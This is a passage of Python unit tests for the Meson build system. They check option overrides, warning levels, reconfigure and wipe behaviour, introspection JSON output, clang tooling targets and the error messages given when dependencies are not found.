# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c_args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError, it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targetting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targetting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targetting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targetting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
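                # Running setup with no directory arguments must fail with a helpful
                # message; running it from an empty dir inside the source tree must succeed.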
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
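        # The cross file routes pkg-config through cross_pkgconfig.py while the
        # environment's PKG_CONFIG_LIBDIR points at the native .pc files; configure
        # once with each value of start_native.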
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
        # The point of this test is wiping while the build directory is the
        # current working directory, so chdir into it (and restore afterwards).
        oldcwd = os.getcwd()
        os.chdir(self.builddir)
        try:
            self.init(testdir, extra_args=['--wipe'])
        finally:
            os.chdir(oldcwd)
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': 'undefined'
}
]
}
self.assertDictEqual(res, expected)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
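        # Helper: assert that every (key, expected_type) pair is present in obj
        # and that the value has the expected type.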
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
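        # (option type name, expected Python type of its value, extra type-specific keys)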
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
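        # Mirror the expected effect of the two setconf calls in the previously
        # loaded data, then check that the regenerated intro file matches it.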
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': False,
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
        Assert that running meson configure on the specified @contents raises
        an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "[Vv]ersion.*string or list"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
        1. The correct message is printed when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
        5. The correct message is printed when the .wrap file is missing for
a sub-subproject.
'''
